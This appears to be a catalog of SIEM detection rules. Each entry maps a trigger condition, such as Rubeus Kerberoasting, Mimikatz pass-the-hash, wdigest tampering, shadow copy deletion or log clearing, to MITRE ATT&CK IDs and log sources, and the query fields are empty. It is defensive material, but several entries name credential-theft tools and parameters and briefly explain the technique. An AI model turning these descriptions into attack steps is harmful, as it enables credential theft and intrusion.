ATT&CK Tag: Proxy
ATT&CK ID: T1090
Minimum Log Source Requirement: Redsocks
Query:
LP_RedSocks Blacklist URL Detection
Trigger Condition: Blacklist URLs are detected.
Minimum Log Source Requirement: Redsocks
Query:
LP_RedSocks FileSharing
Trigger Condition: Filesharing using an alternate platform like 4Shared, FileHippo, Torrent, Picofile, or WeTransfer is detected.
ATT&CK Category: Exfiltration
ATT&CK Tag: Exfiltration over Alternative Protocol
ATT&CK ID: T1048
Minimum Log Source Requirement: Redsocks
Query:
LP_RedSocks Ransomware Connection
Trigger Condition: A ransomware event is detected.
ATT&CK Category: Impact
ATT&CK Tag: Disk Wipe, Disk Content Wipe, Data Encrypted for Impact, Data Destruction, Proxy
ATT&CK ID: T1561, T1561.001, T1486, T1485, T1090
Minimum Log Source Requirement: Redsocks
Query:
LP_RedSocks Sinkhole Detection
Trigger Condition: Sinkhole is detected.
ATT&CK Category: Impact
Minimum Log Source Requirement: Redsocks
Query:
LP_RedSocks Tor Connection
Trigger Condition: A Tor connection is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Proxy
ATT&CK ID: T1090
Minimum Log Source Requirement: Redsocks
Query:
LP_RedSocks Trojan Connection
Trigger Condition: A trojan event is detected.
Minimum Log Source Requirement: Redsocks
Query:
LP_Register new Logon Process by Rubeus
Trigger Condition: Potential use of Rubeus via registered new trusted logon process is detected. Adversaries abuses a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to Brute Force.
ATT&CK Category: Lateral Movement, Privilege Escalation
ATT&CK Tag: Steal or Forge Kerberos Tickets, Kerberoasting
ATT&CK ID: T1558, T1558.003
Minimum Log Source Requirement: Windows
Query:
LP_Registry Persistence Mechanisms Detected
Trigger Condition: Persistence registry keys at the current version folder for registry keys are detected. Adversaries establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers.
ATT&CK Category: Privilege Escalation, Persistence
ATT&CK Tag: Event Triggered Execution, Image File Execution Options Injection
ATT&CK ID: T1546, T1546.012
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Regsvcs-Regasm Detected
Trigger Condition: Adversaries abuses trusted Windows command line utilities regsvcs and regasm for proxy execution of code.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Signed Binary Proxy Execution, Regsvcs/Regasm
ATT&CK ID: T1218, T1218.009
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Remote PowerShell Session
Trigger Condition: Remote PowerShell sessions on endpoints are detected. Powershell allows functionality to execute code on a remote system without using RDP.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter, PowerShell
ATT&CK ID: T1059, T1059.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Remote System Discovery
Trigger Condition: The components like net.exe and ping.exe are used to list other systems by IP address, hostname, or other logical identifiers on a network used for Lateral Movement from the current system.
ATT&CK Category: Discovery
ATT&CK Tag: Remote System Discovery
ATT&CK ID: T1018
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Renamed Binary Detected
Trigger Condition: This alert is triggered whenever it detects the execution of a renamed binary.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Rename System Utilities
ATT&CK ID: T1036.003
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Renamed PsExec Detected
Trigger Condition: Execution of a renamed PsExec used by attackers or malware.
ATT&CK Category: Execution
ATT&CK Tag: Masquerading
ATT&CK ID: T1036
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Rogue Access Point Detected
Trigger Condition: Rouge access point is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Exploitation for Defense Evasion, Exploitation for Defense Evasion, Software Discovery, Security Software Discovery
ATT&CK ID: T1211, T1211, T1518, T1518.001
Minimum Log Source Requirement: Firewall, IDS, IPS
Query:
LP_RSA SecurID Account Lockout
Trigger Condition: User’s account is locked after entering the wrong passcode multiple times in a row.
ATT&CK Category: Credential Access
ATT&CK Tag: Brute Force
ATT&CK ID: T1110
Minimum Log Source Requirement: RSA Secure ID
Query:
LP_Rubeus Hack Tool Detected
Trigger Condition: This alert is triggered whenever it detects command line parameters like asreproast, dump, impersonate user, harvest, and other commands used by the Rubeus hack tool. The Rubeus hack tool is a popular command-line tool used by attackers to perform various attacks related to credential access such as Kerberoasting in Windows environments.
ATT&CK Category: Credential Access
ATT&CK Tag: OS Credential Dumping
ATT&CK ID: T1003
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_SCM Database Handle Failure Detected
Trigger Condition: Non-system user fails to get a handle of the SCM database.
ATT&CK Category: Impact
ATT&CK Tag: Endpoint Denial of Service
ATT&CK ID: T1499
Minimum Log Source Requirement: Windows
Query:
LP_SCM Database Privileged Operation Detected
Trigger Condition: Non-system user performs privileged operation on the SCM database.
ATT&CK Category: Privilege Escalation
ATT&CK Tag: Abuse Elevation Control Mechanism, Bypass User Account Control
ATT&CK ID: T1548, T1548.002
Minimum Log Source Requirement: Windows
Query:
LP_Secure Deletion with SDelete
Trigger Condition: Logpoint detects renaming of a file during deletion using SDelete tool.
ATT&CK Category: Defense Evasion, Impact
ATT&CK Tag: Indicator Removal on Host, File Deletion,Obfuscated Files or Information, Indicator Removal from Tools, Data Destruction, Subvert Trust Controls, Code Signing
ATT&CK ID: T1070, T1070.004, T1027, T1027.005, T1485, T1553, T1553.002
Minimum Log Source Requirement: Windows
Query:
LP_SecurityXploded Tool Detected
Trigger Condition: Execution of the SecurityXploded tools. Adversaries abuse these tools for credential access or other malicious purposes.
ATT&CK Category: Credential Access
ATT&CK Tag: Credentials from Password Stores
ATT&CK ID: T1555
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_smbexec Service Installation Detected
Trigger Condition: Usage of the smbexec.py tool to identify a specific service installation.
ATT&CK Category: Lateral Movement, Execution
ATT&CK Tag: SMB/Windows Admin Shares, Service Execution
ATT&CK ID: T1021.002, T1569.002
Minimum Log Source Requirement: Windows
Query:
LP_SolarisLDAP Group Remove from LDAP Detected
Trigger Condition: The removal of a group from LDAP is detected.
ATT&CK Category: Credential Access, Persistence, Impact, Defense Evasion
ATT&CK Tag: Account Manipulation, Account Access Removal
ATT&CK ID: T1098, T1531
Minimum Log Source Requirement: Solaris LDAP
Query:
LP_SolarisLDAP Password Spraying Attack Detected
Trigger Condition: Multiple login or authentication fail attempts on a SOLARISLDAP by various users are detected. Adversaries can use a list of commonly used passwords against different accounts to attempt to obtain valid account credentials.
ATT&CK Category: -
ATT&CK Tag: -
ATT&CK ID: -
Minimum Log Source Requirement: Solaris LDAP
Query:
LP_SolarisLDAP Possible Bruteforce Attack Detected
Trigger Condition: Five failed Solaris LDAP user login or authentication attempts from a user are detected. Adversaries can perform brute force attacks to find the valid credentials of a user. The fail count number needs to be adjusted to the environment.
ATT&CK Category: Credential Access
ATT&CK Tag: Brute Force
ATT&CK ID: T1110
Minimum Log Source Requirement: Solaris LDAP
Query:
LP_SolarisLDAP Successful Bruteforce Attack Detected
Trigger Condition: Successful login event after multiple failed login counts is detected as defined in the query. Adversaries perform brute-force attacks to discover and validate credentials and gain access to the system and network. The fail count needs to be adjusted according to the environment.
ATT&CK Category: Initial Access, Persistence, Privilege Escalation, Defense Evasion, Credential Access
ATT&CK Tag: Valid Accounts, Account Manipulation, Brute Force, Forced Authentication
ATT&CK ID: T1078, T1098, T1110, T1187
Minimum Log Source Requirement: Solaris LDAP
Query:
LP_SolarisLDAP User Account Lockout Detected
Trigger Condition: A locked user account is detected.
ATT&CK Category: Defense Evasion, Persistence, Privilege Escalation, Initial Access
ATT&CK Tag: Valid Accounts, Abuse Elevation Control Mechanism, Bypass User Access Control
ATT&CK ID: T1078, T1548
Minimum Log Source Requirement: Solaris LDAP
Query:
LP_Sophos XG Firewall - Inbound Attack Detected by IDP
Trigger Condition: An inbound attack defined in IDP policy is detected.
ATT&CK Category: Impact
ATT&CK Tag: Network Denial of Service, Endpoint Denial of Service
ATT&CK ID: T1498, T1499
Minimum Log Source Requirement: Sophos XG Firewall
Query:
LP_Sophos XG Firewall - Outbound Attack Detected by IDP
Trigger Condition: An outbound attack defined in IDP policy is detected.
ATT&CK Category: Impact
ATT&CK Tag: Network Denial of Service, Endpoint Denial of Service
ATT&CK ID: T1498, T1499
Minimum Log Source Requirement: Sophos XG Firewall
Query:
LP_SophosUTM Policy Violation
Trigger Condition: Different policy violation from a source is detected. For this alert to work, the following list must be updated;
EXTREMIST _CONTENT, for example, weapons.
CONCERNED _CONTENT, for example, alcohol, tobacco, gambling, and so on.
CRIMINAL _CONTENT, for example, hacking, drugs, and so on.
VULNERABLE _CONTENT, for example, abuse, and so on.
ATT&CK Category: Defense Evasion, Privilege Escalation, Credential Access
ATT&CK Tag: Abuse Elevation Control Mechanism, Bypass User Access Control, Group Policy Modification, Exploitation for Credential Access, Exploitation for Privilege Escalation
ATT&CK ID: T1548, T1484, T1212, T1068
Minimum Log Source Requirement: Sophos UTM
Query:
LP_SSHD Connection Denied
Trigger Condition: Ten denied connections are detected from the same source.
ATT&CK Category: Lateral Movement, Command and Control, Impact
ATT&CK Tag: Remote Services, Commonly Used Port, Network Denial of Service, Endpoint Denial of Service
ATT&CK ID: T1021, T1498, T1499
Minimum Log Source Requirement: Firewall, IDS, IPS
Query:
LP_Stealthy Scheduled Task Creation via VBA Macro Detected
Trigger Condition: Office products such as Word, Excel, PowerPoint and Outlook.exe load taskschd.dll.
ATT&CK Category: Execution, Persistence, Privilege Escalation
ATT&CK Tag: Scheduled Task/Job, Scheduled Task
ATT&CK ID: T1053, T1053.005
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Sticky Key Like Backdoor Usage Detected
Trigger Condition: This alert is triggered upon detecting the utilization and installation of a backdoor employing a method to register a malicious debugger for native tools accessible from the login screen.
ATT&CK Category: Privilege Escalation, Persistence
ATT&CK Tag: Event Triggered Execution, Accessibility Features
ATT&CK ID: T1546, T1546.008
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Stop Windows Service Detected
Trigger Condition: Windows Service stops.
ATT&CK Category: Impact
ATT&CK Tag: Service Stop
ATT&CK ID: T1489
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Successful Lateral Movement to Administrator via Pass the Hash using Mimikatz Detected
Trigger Condition: This alert is triggered whenever lateral movement is successful in compromising the admin account via pass the hash method.
ATT&CK Category: Lateral Movement
ATT&CK Tag: Use Alternate Authentication Material, Pass the Hash
ATT&CK ID: T1550, T1550.002
Minimum Log Source Requirement: Windows
Query:
LP_Successful Overpass the Hash Attempt
Trigger Condition: Successful Overpass-the-Hash Attempt is detected. This attack involves exploiting both pass-the-hash and pass-the-ticket techniques. Adversaries use this technique when obtaining a cleartext password is impossible, but Kerberos authentication can be used to access the target system.
ATT&CK Category: Lateral Movement
ATT&CK Tag: Pass the Hash
ATT&CK ID: T1550.002
Minimum Log Source Requirement: Windows
Query:
LP_Suspect Svchost Memory Access
Trigger Condition: Suspicious access to svchost process memory such as that used by Invoke-Phantom, to kill the WinRM Windows event logging service. The svchost.exe process is a legitimate system that hosts multiple Windows services. Adversaries may use this process to execute malicious code or gain unauthorized system access.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Impair Defenses, Disable or Modify Tools
ATT&CK ID: T1562, T1562.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious Access to Sensitive File Extensions
Trigger Condition: Sensitive file extensions are detected.
ATT&CK Category: Collection
ATT&CK Tag: Data Staged
ATT&CK ID: T1074
Minimum Log Source Requirement: Windows
Query:
LP_Suspicious Calculator Usage Detected
Trigger Condition: The use of calc.exe with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion, is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Masquerading
ATT&CK ID: T1036
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious Call by Ordinal Detected
Trigger Condition: Suspicious execution of exported functions in DLLs through RunDLL32 via ordinal (16-bit integer).
ATT&CK Category: Defense Evasion
ATT&CK Tag: Rundll32
ATT&CK ID: T1218.011
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Compression Tool Parameters
Trigger Condition: Suspicious command line arguments of standard data compression tools such as 7z and Rar are detected. Adversaries can utilize these techniques to compress data to exfiltrate those data.
ATT&CK Category: Collection, Exfiltration
ATT&CK Tag: Automated Exfiltration, Archive Collected Data
ATT&CK ID: T1020, T1560
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Control Panel DLL Load Detected
Trigger Condition: Suspicious execution of Rundll32 from control.exe. Adversaries may use this technique to proxy execute their malicious applications through signed binary without being noticed by the security controls.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Rundll32
ATT&CK ID: T1218.011
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Csc Source File Folder Detected
Trigger Condition: Suspicious execution of csc.exe that uses a source in a suspicious folder like AppData. Adversaries often download their source code and compile it in the victim’s computer using the functionality of csc.exe.
ATT&CK Category: Execution, Defense Evasion
ATT&CK Tag: Compile After Delivery, Visual Basic, JavaScript, Mshta
ATT&CK ID: T1027.004, T1059.005, T1059.007, T1218.005
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Double Extension Detected
Trigger Condition: This alert is triggered whenever it detects a double extension of a file.
ATT&CK Category: Initial Access
ATT&CK Tag: Spearphishing Attachment
ATT&CK ID: T1566.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Driver Load from Temp
Trigger Condition: Driver loaded from a temporary directory.
ATT&CK Category: Persistence, Privilege Escalation
ATT&CK Tag: Windows Service
ATT&CK ID: T1543.003
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious Eventlog Clear or Configuration Using Wevtutil Detected
Trigger Condition: Clearing or configuration of eventlogs uwing wevtutil, PowerShell and wmic. Adversaries use this technique to delete the logs and hide their traces.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Clear Windows Event Logs, Disable Windows Event Logging
ATT&CK ID: T1070.001, T1562.002
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious GUP Usage Detected
Trigger Condition: This alert is triggered whenever it detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks.
ATT&CK Category: Defense Evasion, Persistence, Privilege Escalation
ATT&CK Tag: DLL Side-Loading
ATT&CK ID: T1574.002
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Kerberos RC4 Ticket Encryption
Trigger Condition: This alert is triggered whenever it detects service ticket requests using RC4 encryption type.
ATT&CK Category: Credential Access
ATT&CK Tag: Kerberoasting
ATT&CK ID: T1558.003
Minimum Log Source Requirement: Windows
Query:
LP_Suspicious Named Pipes Detected
Trigger Condition: Suspicious named pipes commonly used by threat actors are detected.
ATT&CK Category: Defense Evasion, Privilege Escalation, Lateral Movement
ATT&CK Tag: Process Injection, Lateral Tool Transfer
ATT&CK ID: T1055, T1570
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious Outbound Kerberos Connection
Trigger Condition: This alert is triggered whenever it detects suspicious outbound network activity via kerberos.
ATT&CK Category: Credential Access
ATT&CK Tag: Steal or Forge Kerberos Tickets, Kerberoasting
ATT&CK ID: T1558, T1558.003
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Parent of Csc Detected
Trigger Condition: Suspicious parent of csc.exe is detected. It is an executable file part of the Microsoft .NET framework.
ATT&CK Category: Defense Evasion, Execution
ATT&CK Tag: Compile After Delivery, Visual Basic, JavaScript, Mshta
ATT&CK ID: T1027.004, T1059.005, T1059.007, T1218.005
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious PowerShell Invocation Based on Parent Process
Trigger Condition: Suspicious PowerShell invocations from interpreters or unusual programs like wscript or IIS worker process (w3wp.exe). Adversaries can add other suspicious parent processes to increase visibility.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter, PowerShell
ATT&CK ID: T1059, T1059.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Process Start Locations Detected
Trigger Condition: This alert is triggered whenever it detects the execution of suspicious processes from unusual locations like Recycle bin, Fonts folder, etc.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Masquerading
ATT&CK ID: T1036
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Program Location with Network Connections
Trigger Condition: Programs with network connections executed in suspicious file system locations.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Masquerading
ATT&CK ID: T1036
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious PsExec Execution Detected
Trigger Condition: This alert is triggered whenever it detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one.
ATT&CK Category: Lateral Movement
ATT&CK Tag: Lateral Tool Transfer
ATT&CK ID: T1570
Minimum Log Source Requirement: Windows
Query:
LP_Suspicious Remote Thread Created
Trigger Condition: This alert is triggered to detect suspicious processes (those we would not expect to behave in this way like word.exe or outlook.exe) creating remote threads on other processes.This technique is used by malware to inject code and hide in other processes. The event indicates the source and target process. It gives information on the code that will be run in the new thread: StartAddress, StartModule and StartFunction.
ATT&CK Category: Privilege Escalation, Defense Evasion
ATT&CK Tag: Process Injection
ATT&CK ID: T1055
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious RUN Key from Download Detected
Trigger Condition: Suspicious RUN keys created by software located in the Download or temporary Outlook/Internet Explorer directories that may signal malicious activity.
ATT&CK Category: Persistence, Privilege Escalation
ATT&CK Tag: Boot or Logon Autostart Execution, Registry Run Keys/Startup Folder
ATT&CK ID: T1547, T1547.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious Rundll32 Activity Detected
Trigger Condition: This alert is triggered whenever it detects suspicious processes related to the RunDLL32 system binary based on its command line arguments.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Rundll32
ATT&CK ID: T1218.011
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Service Path Modification Detected
Trigger Condition: Modification of service path to powershell/cmd is detected.
ATT&CK Category: Persistence, Privilege Escalation
ATT&CK Tag: Windows Service
ATT&CK ID: T1543.003
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious TSCON Start
Trigger Condition: Execution of tscon.exe process as local system. If tscon.exe run as system, adversaries can gain access to the currently logged-in session without credentials.
ATT&CK Category: Command and Control
ATT&CK Tag: Remote Access Software
ATT&CK ID: T1219
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Potential Suspicious Malware Callback Communication
Trigger Condition: Programs connecting to a typical malware back connect ports based on statistical analysis from two different sandbox system databases are detected.
ATT&CK Category: Command and Control
ATT&CK Tag: Non-Standard Port
ATT&CK ID: T1571
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious Userinit Child Process
Trigger Condition: This alert is triggered whenever it detects a suspicious process spawned by Userinit.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Process Injection
ATT&CK ID: T1055
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Windows ANONYMOUS LOGON Local Account Creation
Trigger Condition: Creation of suspicious accounts similar to ANONYMOUS LOGON, like using additional spaces. This rule catches the exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.
ATT&CK Category: Persistence
ATT&CK Tag: Create Account
ATT&CK ID: T1136
Minimum Log Source Requirement: Windows
Query:
LP_Suspicious WMI Execution Detected
Trigger Condition: When WMI executing suspicious commands, including but not limited to AV product enumeration and remote process creation, are detected. WMIC.exe is a built-in Microsoft program that allows command-line access to the Windows Management Instrumentation. Adversaries can use this technique to create remote or local processes, get details about antivirus and firewalls, delete shadow copies and modify defender configurations.
ATT&CK Category: Execution
ATT&CK Tag: Windows Management Instrumentation
ATT&CK ID: T1047
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_SysKey Registry Keys Access
Trigger Condition: Handle requests and access operations to specific registry keys to calculate the SysKey. Adversaries use a tool like Mimikatz or a script like Invoke-PowerDump to get the SysKey, decrypt Security Account Manager (SAM) database entries from the registry or hive, and get NTLM and LM hashes of local account passwords.
ATT&CK Category: Discovery
ATT&CK Tag: Query Registry
ATT&CK ID: T1012
Minimum Log Source Requirement: Windows
Query:
LP_Sysmon Configuration Modification Detected
Trigger Condition: This alert is triggered whenever modification of Sysmon(System Monitor) Configuration is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Impair Defenses, Indicator Blocking
ATT&CK ID: T1562, T1562.006
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Sysmon Driver Unload Detected
Trigger Condition: Unloading of Sysmon driver is detected. After error events are logged, logs will not be collected and parsed by Sysmon.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Impair Defenses, Disable or Modify Tools
ATT&CK ID: T1562, T1562.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Sysmon Error Event Detected
Trigger Condition: Sysmon error event is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Impair Defenses, Disable or Modify Tools
ATT&CK ID: T1562, T1562.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_System Service Discovery
Trigger Condition: This alert is triggered when binaries that can be used to retrieve Windows service information are detected.
ATT&CK Category: Discovery
ATT&CK Tag: System Service Discovery
ATT&CK ID: T1007
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Tap Driver Installation Detected
Trigger Condition: Installation of TAP software. It indicates possible preparation for data exfiltration using tunnelling techniques.
ATT&CK Category: Exfiltration
ATT&CK Tag: Exfiltration Over Alternative Protocol
ATT&CK ID: T1048
Minimum Log Source Requirement: Windows
Query:
LP_Tasks Folder Evasion Detected
Trigger Condition: Usage of the Windows tasks folder for evasion purposes. Adversaries can take advantage of this and load or influence any script hosts or any .NET application in tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, and eventvwr.
ATT&CK Category: Persistence, Privilege Escalation, Defense Evasion
ATT&CK Tag: Hijack Execution Flow, DLL Side-Loading
ATT&CK ID: T1574, T1574.002
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Terminal Service Process Spawn Detected
Trigger Condition: Process spawned by the terminal service server process. It can be used as an indicator for the exploitation of CVE-2019-0708.
ATT&CK Category: Lateral Movement
ATT&CK Tag: Exploitation of Remote Services
ATT&CK ID: T1210
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Threat Intel Allowed Connections from Suspicious Sources
Trigger Condition: A connection from suspicious sources are detected.
ATT&CK Category: Command and Control
ATT&CK Tag: Proxy
ATT&CK ID: T1090
Minimum Log Source Requirement: Firewall, IDS, IPS
Query:
LP_Threat Intel Connections with Suspicious Domains
Trigger Condition: A connection is established with a suspicious domain.
Minimum Log Source Requirement: Firewall, IDS/IPS
Query:
LP_Transfering Files with Credential Data via Network Shares
Trigger Condition: This alert is triggered whenever sensitive files with well-known file names (such as the ones containing credential data) are transferred using network shares.
ATT&CK Category: Credential Access
ATT&CK Tag: LSASS Memory, Security Account Manager, NTDS
ATT&CK ID: T1003.001, T1003.002, T1003.003
Minimum Log Source Requirement: Windows
Query:
LP_TrendMicroDeepSecurity Virus Quarantined
Trigger Condition: A virus-infected file is quarantined.
ATT&CK Category: Defense Evasion, Discovery
ATT&CK Tag: Obfuscated Files or Information, Indicator Removal from Tools, Network Service Scanning
ATT&CK ID: T1027, T1027.005, T1046
Minimum Log Source Requirement: Trend Micro Deep Security
Query:
LP_UAC Bypass via Event Viewer Detected
Trigger Condition: Usage of eventvwr.exe to bypass UAC.
ATT&CK Category: Defense Evasion, Privilege Escalation
ATT&CK Tag: Abuse Elevation Control Mechanism, Bypass User Access Control
ATT&CK ID: T1548, T1548.002
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Unix Possible Bruteforce Attack
Trigger Condition: An account is not present but is used repeatedly to login. This may be a brute force attack by a bot, malware, or threat agent.
ATT&CK Category: Credential Access
ATT&CK Tag: Brute Force
ATT&CK ID: T1110
Minimum Log Source Requirement: Unix
Query:
LP_Unix User Deleted
Trigger Condition: Deletion of a user account.
ATT&CK Category: Impact
ATT&CK Tag: Account Access Removal
ATT&CK ID: T1531
Minimum Log Source Requirement: Unix
Query:
LP_Unsigned Driver Loading Detected
Trigger Condition: Loading of an unsigned driver.
ATT&CK Category: Privilege Escalation, Persistence
ATT&CK Tag: Create or Modify System Process
ATT&CK ID: T1543
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Possible Ursnif Registry Activity
Trigger Condition: This alert is triggered whenever it detects new registry key under AppDataLowSoftwareMicrosoft ,that was discovered to be used by Ursnif malware.
ATT&CK Category: Execution
ATT&CK Tag: Modify Registry
ATT&CK ID: T1112
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_VBA DLL Loaded by Office
Trigger Condition: Loading of DLL related to VBA macros by Office products. To reduce false positives, we recommend you filter the use of the legitimate macro.
ATT&CK Category: Initial Access
ATT&CK Tag: Phishing, Spearphishing Attachment
ATT&CK ID: T1566, T1566.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_VM - High Risk Vulnerability on High Impact Assets
Trigger Condition: High-risk vulnerability is detected in high impact assets.
ATT&CK Category: Discovery
ATT&CK Tag: Network Service Scanning
ATT&CK ID: T1046
Minimum Log Source Requirement: Qualys, Vulnerability Management
Query:
LP_VM - High Risk Vulnerability on Medium Impact Assets
Trigger Condition: High-risk vulnerability is detected in medium impact assets.
ATT&CK Category: Discovery
ATT&CK Tag: Network Service Scanning
ATT&CK ID: T1046
Minimum Log Source Requirement: Qualys, Vulnerability Management
Query:
LP_VM - Medium Risk Vulnerability on Low Impact Assets
Trigger Condition: Medium-risk vulnerability is detected in low impact assets.
ATT&CK Category: Discovery
ATT&CK Tag: Network Service Scanning
ATT&CK ID: T1046
Minimum Log Source Requirement: Qualys, Vulnerability Management
Query:
LP_WannaCry MS17-010 Vulnerable Sources
Trigger Condition: MS17-010 vulnerability is detected.
Minimum Log Source Requirement: Qualys, Vulnerability Management
Query:
LP_WCE wceaux dll Access Detected
Trigger Condition: wceaux.dll access during Windows Credential Editor (WCE) pass-the-hash remote command execution on the source host.
ATT&CK Category: Credential Access
ATT&CK Tag: OS Credential Dumping
ATT&CK ID: T1003
Minimum Log Source Requirement: Windows
Query:
LP_Wdigest Registry Modification
Trigger Condition: Modification of the wdigest registry value. Adversaries can enable wdigest authentication and retrieve users’ plain text credentials.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Modify Registry
ATT&CK ID: T1112
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Weak Encryption Enabled for User
Trigger Condition: Weak encryption enabled for a user profile, which is later used for hash or password cracking.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Impair Defenses, Disable or Modify Tools
ATT&CK ID: T1562, T1562.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Potential Webshell Activity Detected
Trigger Condition: Specific command line parameters associated with reconnaissance activities via web shells are detected.
ATT&CK Category: Discovery, Persistence
ATT&CK Tag: Remote System Discovery, System Owner/User Discovery, Account Discovery, Web Shell
ATT&CK ID: T1018, T1033, T1087, T1505.003
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Windows Audit Logs Cleared
Trigger Condition: The Windows Security audit log is cleared.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Clear Windows Event Logs
ATT&CK ID: T1070.001
Minimum Log Source Requirement: Windows
Query:
LP_Windows Data Copied to Removable Device
Trigger Condition: A file is copied to removable storage. For this alert to work, you must update the list CRITICAL_HOSTS, which includes hosts where admin monitors file copy across removable storage.
ATT&CK Category: Exfiltration
ATT&CK Tag: Exfiltration Over Physical Medium, Exfiltration over USB
ATT&CK ID: T1052, T1052.001
Minimum Log Source Requirement: Windows
Query:
LP_Windows Defender Antivirus Disable via Registry Modification
Trigger Condition: This alert is triggered whenever the usage of “reg.exe” to tamper with different Windows Defender registry keys is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Disable or Modify Tools
ATT&CK ID: T1562.001
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Shadow Copy Deletion Using OS Utilities Detected
Trigger Condition: Deletion of volume shadow copies using operating systems utilities. Adversaries can utilize Windows internal binaries such as Powershell, wmic, vssadmin, diskshadow, wbadmin and vssadmin to delete shadow copy from the system so that the data recovery and reverting system to saved state is impossible after dropping malware.
ATT&CK Category: Impact, Defense Evasion
ATT&CK Tag: Inhibit System Recovery, Indicator Removal
ATT&CK ID: T1490, T1070
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Windows Excessive Amount of Files Copied to Removable Device
Trigger Condition: One hundred or more files the user copied to the removable storage device are detected. Threat actors generally attempt to exfiltrate as much data as possible through removable storage devices from the victim organizations. Setting the threshold value according to the organization’s behavior or risk appetite is recommended. It is recommended to enable this alert only if the organizational policy explicitly disallows this behavior.
ATT&CK Category: Exfiltration
ATT&CK Tag: Exfiltration Over Physical Medium, Exfiltration over USB
ATT&CK ID: T1052, T1052.001
Minimum Log Source Requirement: Windows
Query:
LP_Windows Failed Login Attempt Using Service Account
Trigger Condition: A user fails to log in using a service account. Generally, failed logon events with logon type 5 indicate the password change without updating the service; however, a possibility of malicious users at work exists. Conversely, the existence of malicious users is less likely to happen as creating a new service or editing an existing service by default requires membership in Administrators or Server Operators. Also, malicious users will already have the authority to perpetuate their desired goal.
ATT&CK Category: Defense Evasion, Persistence, Privilege Escalation, Initial Access
ATT&CK Tag: Valid Accounts
ATT&CK ID: T1078
Minimum Log Source Requirement: Windows
Query:
LP_Windows Failed Login Followed by Lockout Event
